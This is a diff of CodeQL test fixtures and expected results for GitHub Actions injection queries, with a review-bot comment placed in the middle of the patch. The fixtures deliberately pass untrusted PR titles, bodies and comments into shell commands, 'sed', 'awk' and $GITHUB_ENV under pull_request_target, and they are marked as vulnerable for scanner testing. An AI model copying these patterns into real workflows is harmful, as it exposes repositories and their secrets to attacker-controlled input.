| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref index 450079a19f67..b3f6c4bf7822 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref 
+++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-077/EnvVarInjectionCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-077/EnvVarInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index b751cd05888c..94e2af8ecaa7 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,4 +1,3 @@ -#select edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | @@ -93,3 +92,4 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref index cfc44d8a86df..fc6a3a80c984 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref 
@@ -1,2 +1 @@
-query: Security/CWE-077/EnvVarInjectionMedium.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+Security/CWE-077/EnvVarInjectionMedium.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
index b7968c4f7a62..4b6888449c00 100644
--- a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
+++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
@@ -6,4 +6,4 @@ jobs:
 steps:
 - uses: ruby/setup-ruby@v2
 with:
- ruby-version: ${{ github.event.comment.body }} # $ Alert[actions/command-injection/critical]
+ ruby-version: ${{ github.event.comment.body }}
diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
index 7e3d87977b1f..281fd39552a7 100644
--- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
+++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
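Review bot: The new `ruby-version: ${{ github.event.comment.body }}` line in `comment_issue.yml` no longer says that it is the intentionally flagged sink, so I would keep a plain comment on it, `ruby-version: ${{ github.event.comment.body }} # VULNERABLE: issue comment body is untrusted`. The qlref hunks in this patch also drop the `postprocess: utils/test/InlineExpectationsTestQuery.ql` line, so the expectation appears to live only in the `9:26:9:57` row of `CommandInjectionCritical.expected`, which a reader has to map back to this line by hand. A trailing comment does not move that location, since the old side carried one and the row has the same columns. The steps in `arg_injection.yml` keep their `# VULNERABLE` comments, but its `TITLE: ${{github.event.pull_request.title}}` line loses `# $ Source[actions/argument-injection/critical]` in the same way and would benefit from a comment such as `# untrusted: PR title, taint source for the steps below`.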
@@ -1,6 +1,6 @@ -#select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref index 3dc57e81d632..7057e60695b8 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-078/CommandInjectionCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-078/CommandInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index be81405805bc..99ebb1edc05d 100644 
--- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,5 +1,5 @@ -#select edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref index 41310436d7e3..9fbbb302a175 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-078/CommandInjectionMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-078/CommandInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 2566f6cc674b..5d841e50dbb4 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -7,7 +7,7 @@ jobs: test1: runs-on: ubuntu-latest env: - TITLE: ${{github.event.pull_request.title}} # $ Source[actions/argument-injection/critical] + TITLE: ${{github.event.pull_request.title}} steps: - name: Checkout uses: actions/checkout@v4 
@@ -18,50 +18,50 @@ jobs: echo "s/FOO/$TITLE/g" - run: | # VULNERABLE - sed "s/FOO/$TITLE/g" # $ Alert[actions/argument-injection/critical] + sed "s/FOO/$TITLE/g" - run: | # VULNERABLE - echo "foo" | sed "s/FOO/$TITLE/g" > bar # $ Alert[actions/argument-injection/critical] + echo "foo" | sed "s/FOO/$TITLE/g" > bar - run: | # VULNERABLE - echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) # $ Alert[actions/argument-injection/critical] + echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - run: | # VULNERABLE - awk "BEGIN {$TITLE}" # $ Alert[actions/argument-injection/critical] + awk "BEGIN {$TITLE}" - run: | # VULNERABLE - sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json # $ Alert[actions/argument-injection/critical] + sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json - run: | # VULNERABLE - sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # $ Alert[actions/argument-injection/critical] + sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json - run: | # VULNERABLE sed -e 's##${TITLE}#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##TITLE#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | # VULNERABLE sed -e 's##TITLE#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | # VULNERABLE BODY=$(git log --format=%s) - sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] + sed "s/FOO/$BODY/g" > /tmp/foo - run: | # VULNERABLE BODY=$(git diff --name-only HEAD) - sed "s/FOO/$BODY/g" > /tmp/foo # $ 
Alert[actions/argument-injection/critical] + sed "s/FOO/$BODY/g" > /tmp/foo - run: | # VULNERABLE BODY=$(git diff --name-only HEAD ) - sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] + sed "s/FOO/$BODY/g" > /tmp/foo - run: | # VULNERABLE BODY=$(git diff --name-only HEAD^ | xargs) - sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] + sed "s/FOO/$BODY/g" > /tmp/foo - run: | # NOT VULNERABLE echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 4f4d67c2325c..5eddb791ae5c 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected 
@@ -1,16 +1,3 @@ -#select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | 
@@ -33,3 +20,16 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths +#select +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
